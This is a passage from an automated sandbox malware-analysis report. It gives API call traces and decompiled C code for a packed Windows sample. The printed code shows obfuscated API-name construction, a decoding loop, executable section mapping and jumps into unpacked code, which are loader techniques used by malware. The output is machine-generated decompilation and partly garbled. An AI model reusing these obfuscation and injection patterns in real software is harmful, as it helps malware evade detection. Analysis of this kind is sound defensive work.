      • Part of subcall function 012A25A8: SafeArrayCreate.OLEAUT32(00000011,00000001,012AC9E8), ref: 012A25D0
      • Part of subcall function 012A25A8: memcpy.NTDLL(?,012A1C21,00000008), ref: 012A25EA
      • Part of subcall function 012A25A8: SafeArrayDestroy.OLEAUT32(012A1D55), ref: 012A2616
    • HeapFree.KERNEL32(00000000,00000000,012A1D55), ref: 012A1C2C
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 004015A6, Relevance: 3.0, APIs: 2, Instructions: 28native
    C-Code - Quality: 75%
    			E004015A6(void* _a4, void* _a8, PVOID* _a12) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t12;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t12 = NtMapViewOfSection(_a4, _a8, _a12, 0, 0,  &_v16,  &_v8, 2, 0, 0x40); // executed
				return RtlNtStatusToDosError(_t12);
			}







    0x004015b6
    0x004015bc
    0x004015ca
    0x004015d3
    0x004015e2

    APIs
    • NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 004015D3
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 004015DA
    Memory Dump Source
    • Source File: 00000001.00000002.22428269387.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000002.22428255140.00400000.00000002.sdmp
    • Associated: 00000001.00000002.22428283830.00404000.00000002.sdmp
    • Associated: 00000001.00000002.22428296316.00405000.00000004.sdmp
    • Associated: 00000001.00000002.22428312812.00407000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_400000_payload.jbxd
    Function 012A5103, Relevance: 1.6, APIs: 1, Instructions: 72com
    APIs
      • Part of subcall function 012A1000: RtlAllocateHeap.NTDLL(00000000,?,012A3BE8), ref: 012A100C
    • CoCreateInstance.OLE32(012AC028,00000000,00000004,012AC048,00000000), ref: 012A5128
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 012A4A4E, Relevance: 19.7, APIs: 13, Instructions: 219memory

    Control-flow Graph

    APIs
    • RtlQueryPerformanceFrequency.NTDLL(?), ref: 012A4AB7
    • RtlQueryPerformanceCounter.NTDLL(?), ref: 012A4AC1
    • _aulldiv.NTDLL(?,?,?,?), ref: 012A4AD3
      • Part of subcall function 012A4642: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A465E
      • Part of subcall function 012A4642: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A467C
    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 012A4B15
    • RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A4B38
    • RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4B56
      • Part of subcall function 012A491D: lstrcat.KERNEL32(00000000,?), ref: 012A4966
      • Part of subcall function 012A491D: StrTrimA.SHLWAPI(00000000,012AA278), ref: 012A4983
    • StrTrimA.SHLWAPI(00000000,012AA27C), ref: 012A4B8D
      • Part of subcall function 012A42F8: lstrcpy.KERNEL32(00000000,/images/), ref: 012A4323
      • Part of subcall function 012A42F8: lstrcat.KERNEL32(00000000,?), ref: 012A432E
    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 012A4CBB
      • Part of subcall function 012A4387: lstrlen.KERNEL32(?,00000000,?,00000000,012A1BD9,?,00000000,?,00000000,?,?,012A1D55), ref: 012A4390
      • Part of subcall function 012A4387: mbstowcs.NTDLL ref: 012A43B7
      • Part of subcall function 012A4387: memset.NTDLL ref: 012A43C9
    • wcstombs.NTDLL ref: 012A4C53
      • Part of subcall function 012A54F6: memcpy.NTDLL(00000000,012AA0A4,-00000001,?,012AA0A4,00000000,012A4C65,00000000,00000000,012AA0A4,?,?,00000000), ref: 012A55AE
      • Part of subcall function 012A1015: HeapFree.KERNEL32(00000000,?,012A3C17), ref: 012A1021
      • Part of subcall function 012A4F8D: SysAllocString.OLEAUT32(?), ref: 012A4FCB
      • Part of subcall function 012A4F8D: ObjectStublessClient10.OLE32(?,?), ref: 012A5064
      • Part of subcall function 012A4F8D: StrStrIW.SHLWAPI(?,012AC000), ref: 012A507B
      • Part of subcall function 012A4F8D: SysFreeString.OLEAUT32(?), ref: 012A509B
      • Part of subcall function 012A4F8D: SafeArrayDestroy.OLEAUT32(?), ref: 012A50E6
      • Part of subcall function 012A4F8D: SysFreeString.OLEAUT32(?), ref: 012A50F4
    • HeapFree.KERNEL32(00000000,?,00000000), ref: 012A4CAB
      • Part of subcall function 012A45F0: RtlEnterCriticalSection.NTDLL(012AB26C), ref: 012A45F9
      • Part of subcall function 012A45F0: Sleep.KERNEL32(0000000A,?,012A1D8F,00000002,?,?), ref: 012A4603
      • Part of subcall function 012A45F0: RtlLeaveCriticalSection.NTDLL(012AB26C), ref: 012A4636
      • Part of subcall function 012A5103: CoCreateInstance.OLE32(012AC028,00000000,00000004,012AC048,00000000), ref: 012A5128
    • HeapFree.KERNEL32(00000000,00000000,?), ref: 012A4CC9
    • HeapFree.KERNEL32(00000000,?), ref: 012A4CD9
    • HeapFree.KERNEL32(00000000,?), ref: 012A4CE9
    Memory Dump Source
    • Source File: 00000001.00000002.22428592350.012A1000.00000020.sdmp, Offset: 012A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_12a1000_payload.jbxd
    Function 004019C6, Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 192memorysynchronization
    C-Code - Quality: 49%
    			E004019C6() {
				void* _t15;
				void* _t16;
				intOrPtr* _t17;
				intOrPtr _t18;
				intOrPtr _t19;
				struct HINSTANCE__* _t23;
				intOrPtr _t24;
				struct HINSTANCE__* _t27;
				void* _t28;
				intOrPtr _t29;
				long _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				void* _t39;
				void* _t42;
				void* _t43;
				intOrPtr* _t45;
				signed int _t52;
				intOrPtr* _t53;
				signed int _t59;
				signed int _t60;
				signed int _t62;
				signed int _t66;
				signed int* _t69;
				void* _t71;
				void* _t75;
				void* _t77;
				intOrPtr* _t79;

				_t15 = HeapCreate(0x40000, 0x688, 0x688); // executed
				if(_t15 == 0) {
					L21:
					L22:
					goto L22;
				}
				_t52 =  ~(0 - _t15);
				_t16 = 0;
				_t69 = 0x4040f4;
				_t59 =  ~0xFFFFFFFFA363D87B;
				_push(_t52);
				while(_t16 != 0x688) {
					_t62 =  *_t69;
					_t69 =  &(_t69[1]);
					_t66 =  !_t62 + 0x28 + _t59 - 1;
					_t60 = 0xffffffff;
					_t59 = _t60 & _t66;
					 *_t52 = _t66;
					asm("clc");
					asm("sbb ecx, 0xfffffffc");
					_t16 = _t16 + 4;
				}
				_pop(_t53);
				_t17 =  *_t53(__imp__LoadLibraryA);
				 *_t17 =  *_t17 + _t17;
				 *_t17 =  *_t17 + _t17;
				 *_t17 =  *_t17 + _t17;
				 *_t17 =  *_t17 + _t17;
				 *_t17 =  *_t17 + _t17;
				 *((intOrPtr*)(_t59 + 1)) =  *((intOrPtr*)(_t59 + 1)) + _t53;
				 *_t79 =  *_t79 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				_t18 = E00401CAE(_t17);
				__eflags = _t18;
				if(_t18 != 0) {
					L9:
					_push(1);
					 *_t79 =  *_t79 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t19 = E00401CAE(_t18); // executed
					__eflags = _t19;
					if(_t19 != 0) {
						goto L21;
					}
					__eflags = _t77 - 0xfd00;
					if(_t77 < 0xfd00) {
						goto L21;
					}
					 *0x305061 = 0x6b;
					 *0x00305062 = 0x65;
					 *0x00305063 = 0x72;
					 *0x00305064 = 0x6e;
					 *0x00305065 = 0x65;
					 *0x00305066 = 0x6c;
					 *0x00305067 = 0x33;
					_t23 = LoadLibraryA("kernel32.dll");
					 *0x40500e = _t23;
					_t45 = "pejpCreate";
					 *_t45 = 0x70616548;
					 *((short*)(_t45 + 4)) = 0x7243;
					 *((short*)(_t45 + 6)) = 0x6165;
					_push(_t45);
					_push(_t23);
					_push(__imp__LoadLibraryExW);
					_pop( *0x40500a);
					_push(_t23);
					_push(1);
					 *_t79 =  *_t79 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf"); // executed
					_t24 = E00401CAE(_t23); // executed
					__eflags = _t24;
					if(_t24 != 0) {
						goto L21;
					}
					L"oidsapi.dll" = 0x6e;
					M00405038 = 0x74;
					_t27 = LoadLibraryExW( &((L"")[1]), 0, 0);
					 *((intOrPtr*)(_t77 - 4)) = _t27;
					_push(_t27);
					__eflags = _t27;
					if(_t27 == 0) {
						goto L21;
					}
					_push("zzdjjqpqaxlgt"); // executed
					_t28 = E00402E18(_t27); // executed
					_push("true");
					 *_t79 =  *_t79 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz"); // executed
					_t29 = E00402BB3(_t28); // executed
					__eflags = _t29;
					if(_t29 != 0) {
						goto L21;
					}
					_push(0x1e);
					do {
						_t31 = WaitForSingleObject(0xffffffff, 1); // executed
						 *_t79 =  *_t79 - 1;
						__eflags =  *_t79;
					} while ( *_t79 != 0);
					 *0x40501a = 0;
					_push("zzdjjqpqaxlgt"); // executed
					E00402E18(_t31); // executed
					_pop(_t71);
					 *((intOrPtr*)(_t79 + 4)) =  *((intOrPtr*)(_t79 + 4)) +  *((intOrPtr*)(_t71 + 0x3c));
					_t75 = _t71;
					 *0x405002 = _t75 + 0xa4;
					_t33 =  *0x405002;
					_t34 =  *_t33;
					 *0x405002 = _t34;
					__eflags =  *0x405002 - 0xfff;
					if(__eflags > 0) {
						goto L21;
					}
					asm("sbb dword [ecx], 0xa0");
					if(__eflags < 0) {
						goto L21;
					}
					 *0x405016 = GetProcAddress();
					LoadLibraryA("kernel32.dll");
					 *0x40501a = E004019C6;
					_push(E00402749);
					_pop(_t39);
					 *0x40501a =  *0x40501a + _t39;
					__eflags =  *((intOrPtr*)(_t77 - 4)) - 0xffffffff;
					if( *((intOrPtr*)(_t77 - 4)) != 0xffffffff) {
						 *0x40501a =  *0x40501a - E00402749;
						goto __eax;
					}
					 *0x40501a =  *0x40501a ^ E004019C6;
					goto __eax;
				}
				_push(0xf);
				 *_t79 =  *_t79 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				_t18 = E00402BB3(_t18);
				__eflags = _t18;
				if(_t18 != 0) {
					goto L9;
				}
				_push( *0x4050cf);
				_t42 = E00402AD0(_t18);
				_push(0xf);
				 *_t79 =  *_t79 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				_t18 = E00402BB3(_t42);
				__eflags = _t18;
				if(_t18 != 0) {
					goto L9;
				}
				_push( *0x4050cf);
				_t43 = E00402AD0(_t18);
				_push(0xf);
				 *_t79 =  *_t79 - 1;
				_push(0x4050b3);
				_push("bkktdsxxkjueaz");
				_t18 = E00402BB3(_t43);
				__eflags = _t18;
				if(_t18 != 0) {
					goto L9;
				}
				_push(E00402749);
				return E00402749;
			}































    0x004019e1
    0x004019ea
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x004019f4
    0x004019f6
    0x004019f8
    0x00401a05
    0x00401a07
    0x00401a08
    0x00401a11
    0x00401a13
    0x00401a1d
    0x00401a20
    0x00401a21
    0x00401a23
    0x00401a25
    0x00401a26
    0x00401a29
    0x00401a29
    0x00401a2e
    0x00401a37
    0x00401a39
    0x00401a3b
    0x00401a3d
    0x00401a3f
    0x00401a41
    0x00401a43
    0x00401a46
    0x00401a49
    0x00401a4e
    0x00401a53
    0x00401a58
    0x00401a5b
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00000000
    0x00000000
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x00401a61
    0x00401a63
    0x00401a66
    0x00401a6b
    0x00401a70
    0x00401a75
    0x00401a77
    0x00000000
    0x00000000
    0x00401a7d
    0x00401a83
    0x00401a88
    0x00401a8a
    0x00401a8d
    0x00401a92
    0x00401a97
    0x00401a9c
    0x00401a9e
    0x00000000
    0x00000000
    0x00401aa4
    0x00401aaa
    0x00401aaf
    0x00401ab1
    0x00401ab4
    0x00401ab9
    0x00401abe
    0x00401ac3
    0x00401ac6
    0x00000000
    0x00000000
    0x00401ad2
    0x00401ad3

    APIs
    • HeapCreate.KERNELBASE ref: 004019E1
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401077, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 181synchronization
    C-Code - Quality: 47%
    			E00401077() {
				void* _t11;
				void* _t12;
				intOrPtr _t14;
				intOrPtr _t15;
				struct HINSTANCE__* _t19;
				intOrPtr _t20;
				struct HINSTANCE__* _t23;
				void* _t24;
				intOrPtr _t25;
				long _t27;
				intOrPtr* _t29;
				intOrPtr _t30;
				void* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				intOrPtr* _t44;
				void* _t48;
				void* _t52;
				void* _t54;
				intOrPtr* _t56;

				_push("zzdjjqpqaxlgt");
				_t12 = E00402E18(_t11);
				_push(1);
				 *_t56 =  *_t56 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t12) != 0) {
					L18:
					_push(0xf);
					 *_t56 =  *_t56 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t14 = E00402BB3(_t13);
					__eflags = _t14;
					if(_t14 != 0) {
						L6:
						_push(1);
						 *_t56 =  *_t56 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t15 = E00401CAE(_t14); // executed
						__eflags = _t15;
						if(_t15 != 0) {
							L22:
							L23:
							goto L23;
						}
						__eflags = _t54 - 0xfd00;
						if(_t54 < 0xfd00) {
							goto L22;
						}
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t19 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t19;
						_t44 = "pejpCreate";
						 *_t44 = 0x70616548;
						 *((short*)(_t44 + 4)) = 0x7243;
						 *((short*)(_t44 + 6)) = 0x6165;
						_push(_t44);
						_push(_t19);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t19);
						_push(1);
						 *_t56 =  *_t56 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t20 = E00401CAE(_t19); // executed
						__eflags = _t20;
						if(_t20 != 0) {
							goto L22;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t23 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t54 - 4)) = _t23;
						_push(_t23);
						__eflags = _t23;
						if(_t23 == 0) {
							goto L22;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t24 = E00402E18(_t23); // executed
						_push("true");
						 *_t56 =  *_t56 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t25 = E00402BB3(_t24); // executed
						__eflags = _t25;
						if(_t25 != 0) {
							goto L22;
						}
						_push(0x1e);
						do {
							_t27 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t56 =  *_t56 - 1;
							__eflags =  *_t56;
						} while ( *_t56 != 0);
						_t56 = _t56 + 4;
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t27); // executed
						_pop(_t48);
						 *_t56 =  *_t56 +  *((intOrPtr*)(_t48 + 0x3c));
						_t52 = _t48;
						 *0x405002 = _t52 + 0xa4;
						_t29 =  *0x405002;
						_t30 =  *_t29;
						 *0x405002 = _t30;
						__eflags =  *0x405002 - 0xfff;
						if(__eflags > 0) {
							goto L22;
						}
						asm("sbb dword [ecx], 0xa0");
						if(__eflags < 0) {
							goto L22;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t35);
						 *0x40501a =  *0x40501a + _t35;
						__eflags =  *((intOrPtr*)(_t54 - 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t54 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							_t13 =  *0x40501a; // 0x0
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
					_push("zzdjjqpqaxlgt");
					_t37 = E00402E18(_t14);
					_push( *0x4050cf);
					_t38 = E00402AD0(_t37);
					_push(0xf);
					 *_t56 =  *_t56 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t14 = E00402BB3(_t38);
					__eflags = _t14;
					if(_t14 != 0) {
						goto L6;
					}
					_push(0xf);
					 *_t56 =  *_t56 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t14 = E00402BB3(_t14);
					__eflags = _t14;
					if(_t14 != 0) {
						goto L6;
					}
					_push("zzdjjqpqaxlgt");
					_t39 = E00402E18(_t14);
					_push("zzdjjqpqaxlgt");
					E00402E18(_t39);
					_push(0x401a44);
					return 0x401a44;
				} else {
					_push(0xf);
					 *_t56 =  *_t56 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					if(_t13 != 0) {
						goto L18;
					} else {
						_push(1);
						 *_t56 =  *_t56 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf");
						if(_t13 != 0) {
							goto L18;
						} else {
							_push(1);
							 *_t56 =  *_t56 - 1;
							_push("vwzhywkzcohliu");
							_push("oledcrpjmksdjf");
							if(_t13 != 0) {
								goto L18;
							} else {
								_push(0xf);
								 *_t56 =  *_t56 - 1;
								_push(0x4050b3);
								_push("bkktdsxxkjueaz");
								if(_t13 != 0) {
									goto L18;
								} else {
									_push( *0x4050cf);
									E00402AD0(_t13);
									_push(0x401e1e);
									return 0x401e1e;
								}
							}
						}
					}
				}
			}
























    0x00401077
    0x0040107c
    0x00401081
    0x00401083
    0x00401086
    0x0040108b
    0x00401097
    0x00402451
    0x00402451
    0x00402453
    0x00402456
    0x0040245b
    0x00402460
    0x00402465
    0x00402467
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
    0x00401e45
    0x00000000
    0x00000000
    0x00401e50
    0x00401e53
    0x00401e57
    0x00401e5b
    0x00401e5f
    0x00401e63
    0x00401e67
    0x00401e72
    0x00401e75
    0x00401e7b
    0x00401e81
    0x00401e87
    0x00401e8d
    0x00401e93
    0x00401e94
    0x00401e95
    0x00401e9b
    0x00401ea1
    0x00401ea2
    0x00401ea4
    0x00401ea7
    0x00401eac
    0x00401eb1
    0x00401eb6
    0x00401eb9
    0x00000000
    0x00000000
    0x00401ec0
    0x00401ec7
    0x00401ee0
    0x00401ee2
    0x00401ee5
    0x00401ee6
    0x00401ee8
    0x00000000
    0x00000000
    0x00401eee
    0x00401ef3
    0x00401ef8
    0x00401efa
    0x00401efd
    0x00401f02
    0x00401f07
    0x00401f0c
    0x00401f0e
    0x00000000
    0x00000000
    0x00401f14
    0x00401f16
    0x00401f1f
    0x00401f21
    0x00401f21
    0x00401f21
    0x00401f27
    0x00401f2a
    0x00401f31
    0x00401f36
    0x00401f3b
    0x00401f43
    0x00401f46
    0x00401f4d
    0x00401f59
    0x00401f5c
    0x00401f5d
    0x00401f67
    0x00401f6d
    0x00000000
    0x00000000
    0x00401f73
    0x00401f79
    0x00000000
    0x00000000
    0x00401f88
    0x00401f98
    0x00401f9a
    0x00401fa4
    0x00401fa9
    0x00401faa
    0x00401fb0
    0x00401fb7
    0x00401fca
    0x00401fd4
    0x00401fd9
    0x00401fd9
    0x00401fb9
    0x00401fc8
    0x00401fc8
    0x0040246d
    0x00402472
    0x00402477
    0x0040247d
    0x00402482
    0x00402484
    0x00402487
    0x0040248c
    0x00402491
    0x00402496
    0x00402498
    0x00000000
    0x00000000
    0x0040249e
    0x004024a0
    0x004024a3
    0x004024a8
    0x004024ad
    0x004024b2
    0x004024b5
    0x00000000
    0x00000000
    0x004024bb
    0x004024c0
    0x004024c5
    0x004024ca
    0x004024d5
    0x004024d6
    0x0040109d
    0x0040109d
    0x0040109f
    0x004010a2
    0x004010a7
    0x004010b4
    0x00000000
    0x004010ba
    0x004010ba
    0x004010bc
    0x004010bf
    0x004010c4
    0x004010d0
    0x00000000
    0x004010d6
    0x004010d6
    0x004010d8
    0x004010db
    0x004010e0
    0x004010ed
    0x00000000
    0x004010f3
    0x004010f3
    0x004010f5
    0x004010f8
    0x004010fd
    0x0040110a
    0x00000000
    0x00401110
    0x00401110
    0x00401116
    0x00401121
    0x00401122
    0x00401122
    0x0040110a
    0x004010ed
    0x004010d0
    0x004010b4

    APIs
    • WaitForSingleObject.KERNEL32(000000FF,00000001,0000001E,bkktdsxxkjueaz,004050B3), ref: 00401F1F
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.21987324300.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.21987297333.00400000.00000002.sdmp
    • Associated: 00000001.00000001.21987351508.00404000.00000008.sdmp
    • Associated: 00000001.00000001.21987376606.00406000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_1_400000_payload.jbxd
    Function 00401364, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 176synchronization
    C-Code - Quality: 49%
    			E00401364() {
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t14;
				struct HINSTANCE__* _t18;
				intOrPtr _t19;
				struct HINSTANCE__* _t22;
				void* _t23;
				intOrPtr _t24;
				long _t26;
				intOrPtr* _t28;
				intOrPtr _t29;
				void* _t34;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t46;
				void* _t50;
				void* _t54;
				void* _t56;
				intOrPtr* _t58;

				_push(1);
				 *_t58 =  *_t58 - 1;
				_push("vwzhywkzcohliu");
				_push("oledcrpjmksdjf");
				if(E00401CAE(_t11) != 0) {
					L19:
					_push(0xf);
					 *_t58 =  *_t58 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t13 = E00402BB3(_t12);
					__eflags = _t13;
					if(_t13 != 0) {
						L5:
						_push(1);
						 *_t58 =  *_t58 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t14 = E00401CAE(_t13); // executed
						__eflags = _t14;
						if(_t14 != 0) {
							L17:
							L18:
							goto L18;
						}
						__eflags = _t56 - 0xfd00;
						if(_t56 < 0xfd00) {
							goto L17;
						}
						 *0x305061 = 0x6b;
						 *0x00305062 = 0x65;
						 *0x00305063 = 0x72;
						 *0x00305064 = 0x6e;
						 *0x00305065 = 0x65;
						 *0x00305066 = 0x6c;
						 *0x00305067 = 0x33;
						_t18 = LoadLibraryA("kernel32.dll");
						 *0x40500e = _t18;
						_t46 = "pejpCreate";
						 *_t46 = 0x70616548;
						 *((short*)(_t46 + 4)) = 0x7243;
						 *((short*)(_t46 + 6)) = 0x6165;
						_push(_t46);
						_push(_t18);
						_push(__imp__LoadLibraryExW);
						_pop( *0x40500a);
						_push(_t18);
						_push(1);
						 *_t58 =  *_t58 - 1;
						_push("vwzhywkzcohliu");
						_push("oledcrpjmksdjf"); // executed
						_t19 = E00401CAE(_t18); // executed
						__eflags = _t19;
						if(_t19 != 0) {
							goto L17;
						}
						L"oidsapi.dll" = 0x6e;
						M00405038 = 0x74;
						_t22 = LoadLibraryExW( &((L"")[1]), 0, 0);
						 *((intOrPtr*)(_t56 - 4)) = _t22;
						_push(_t22);
						__eflags = _t22;
						if(_t22 == 0) {
							goto L17;
						}
						_push("zzdjjqpqaxlgt"); // executed
						_t23 = E00402E18(_t22); // executed
						_push("true");
						 *_t58 =  *_t58 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz"); // executed
						_t24 = E00402BB3(_t23); // executed
						__eflags = _t24;
						if(_t24 != 0) {
							goto L17;
						}
						_push(0x1e);
						do {
							_t26 = WaitForSingleObject(0xffffffff, 1); // executed
							 *_t58 =  *_t58 - 1;
							__eflags =  *_t58;
						} while ( *_t58 != 0);
						 *0x40501a = 0;
						_push("zzdjjqpqaxlgt"); // executed
						E00402E18(_t26); // executed
						_pop(_t50);
						 *((intOrPtr*)(_t58 + 4)) =  *((intOrPtr*)(_t58 + 4)) +  *((intOrPtr*)(_t50 + 0x3c));
						_t54 = _t50;
						 *0x405002 = _t54 + 0xa4;
						_t28 =  *0x405002;
						_t29 =  *_t28;
						 *0x405002 = _t29;
						__eflags =  *0x405002 - 0xfff;
						if(__eflags > 0) {
							goto L17;
						}
						asm("sbb dword [ecx], 0xa0");
						if(__eflags < 0) {
							goto L17;
						}
						 *0x405016 = GetProcAddress();
						LoadLibraryA("kernel32.dll");
						 *0x40501a = E004019C6;
						_push(E00402749);
						_pop(_t34);
						 *0x40501a =  *0x40501a + _t34;
						__eflags =  *((intOrPtr*)(_t56 - 4)) - 0xffffffff;
						if( *((intOrPtr*)(_t56 - 4)) != 0xffffffff) {
							 *0x40501a =  *0x40501a - E00402749;
							goto __eax;
						}
						 *0x40501a =  *0x40501a ^ E004019C6;
						goto __eax;
					}
					_push(1);
					 *_t58 =  *_t58 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					_t13 = E00401CAE(_t13);
					__eflags = _t13;
					if(_t13 != 0) {
						goto L5;
					}
					_push("zzdjjqpqaxlgt");
					_t37 = E00402E18(_t13);
					_push( *0x4050cf);
					_t38 = E00402AD0(_t37);
					_push( *0x4050cf);
					_t39 = E00402AD0(_t38);
					_push("zzdjjqpqaxlgt");
					_t40 = E00402E18(_t39);
					_push(0xf);
					 *_t58 =  *_t58 - 1;
					_push(0x4050b3);
					_push("bkktdsxxkjueaz");
					_t13 = E00402BB3(_t40);
					__eflags = _t13;
					if(_t13 != 0) {
						goto L5;
					}
					_push(E00401811);
					return E00401811;
				} else {
					_push( *0x4050cf);
					_t42 = E00402AD0(_t12);
					_push(1);
					 *_t58 =  *_t58 - 1;
					_push("vwzhywkzcohliu");
					_push("oledcrpjmksdjf");
					if(E00401CAE(_t42) != 0) {
						goto L19;
					} else {
						_push("zzdjjqpqaxlgt");
						_t43 = E00402E18(_t12);
						_push(0xf);
						 *_t58 =  *_t58 - 1;
						_push(0x4050b3);
						_push("bkktdsxxkjueaz");
						if(E00402BB3(_t43) != 0) {
							goto L19;
						} else {
							_push("zzdjjqpqaxlgt");
							_t44 = E00402E18(_t12);
							_push(1);
							 *_t58 =  *_t58 - 1;
							_push("vwzhywkzcohliu");
							_push("oledcrpjmksdjf");
							if(E00401CAE(_t44) != 0) {
								goto L19;
							} else {
								_push(0x401e1e);
								return 0x401e1e;
							}
						}
					}
				}
			}



























    0x00401364
    0x00401366
    0x00401369
    0x0040136e
    0x0040137b
    0x00402bba
    0x00402bba
    0x00402bbc
    0x00402bbf
    0x00402bc4
    0x00402bc9
    0x00402bce
    0x00402bd1
    0x00401e1e
    0x00401e1e
    0x00401e20
    0x00401e23
    0x00401e28
    0x00401e2d
    0x00401e32
    0x00401e34
    0x00402749
    0x0040274c
    0x00000000
    0x0040274c
    0x00401e40
